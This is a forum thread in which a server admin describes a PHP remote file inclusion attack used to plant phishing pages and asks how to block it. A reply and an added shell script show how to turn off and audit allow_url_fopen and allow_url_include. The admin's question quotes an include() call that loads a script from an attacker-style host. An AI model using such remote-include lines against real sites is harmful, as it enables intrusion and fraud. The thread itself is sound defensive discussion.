
Avoiding remote PHP includes()

Discussion in 'General Discussion' started by Heritz, May 13, 2007.

  1. Heritz

    Heritz Well-Known Member

    Hi all,

    Recently my company server has been attacked by phishers who are using a website vulnerability to upload files and get bank account information. We have been contacted by the bank and we fixed the problem within the website, but I still have a question:

    The hack attempt was done using the remote include ability of PHP; I mean they exploited the include() function using something like include('http://myhackingwebsite.com/script.txt'); and then they uploaded the phishing files using system commands.

    I denied the system commands in my php.ini but I would also like to know how to avoid remote includes on PHP. I have enabled the open_basedir for all the sites, but as far as I know, open_basedir only affects file management functions, not includes.

    Any suggestion? Thanks in advance!
     
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

  3. flash7

    flash7 Well-Known Member

    php.ini

    ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
    allow_url_fopen = Off
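
An added example, not part of flash7's post or of cPanel's tooling: a small shell check that reports whether a php.ini really ends up with the setting above turned off, since a commented-out line or a later duplicate changes the result. The function names are hypothetical, and `allow_url_include` (a PHP directive available since 5.2.0, default Off) is checked as well although the thread does not mention it.

```shell
#!/bin/sh
# Added example (not from the thread): check what a php.ini really sets.
# Assumption: only plain "name = value" lines are read; [PATH=]/[HOST=]
# sections and per-directory overrides are not interpreted.

# ini_bool DIRECTIVE FILE DEFAULT -> prints "On" or "Off"
ini_bool() {
  awk -v key="$1" -v def="$3" '
    /^[ \t]*;/ { next }                       # skip comment lines
    {
      line = $0
      sub(/;.*/, "", line)                    # drop trailing comment
      n = index(line, "=")
      if (n == 0) next
      k = substr(line, 1, n - 1); v = substr(line, n + 1)
      gsub(/[ \t"]/, "", k); gsub(/[ \t"]/, "", v)
      if (k == key) { val = tolower(v); seen = 1 }   # last one wins
    }
    END {
      if (!seen) val = tolower(def)
      if (val ~ /^(1|on|yes|true)$/) print "On"; else print "Off"
    }' "$2"
}

# audit_php_ini FILE -> prints a summary; exit status 0 only if both
# URL-wrapper directives are effectively Off.
audit_php_ini() (
  fopen=$(ini_bool allow_url_fopen "$1" On)       # PHP default is On
  incl=$(ini_bool allow_url_include "$1" Off)     # PHP >= 5.2.0, default Off
  echo "$1: allow_url_fopen=$fopen allow_url_include=$incl"
  [ "$fopen" = Off ] && [ "$incl" = Off ]
)

# Constructed sample: the setting is present but overridden further down.
sample=$(mktemp)
cat > "$sample" <<'EOF'
[PHP]
; allow_url_include = On
allow_url_fopen = Off
disable_functions = system,exec
allow_url_fopen = On   ; re-enabled by a later edit
EOF
audit_php_ini "$sample" || echo "WARNING: remote URL access still enabled"
rm -f "$sample"
```

On a server with several php.ini files, the same function can be run against each one; a non-zero exit status marks the files that still allow URL wrappers.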
     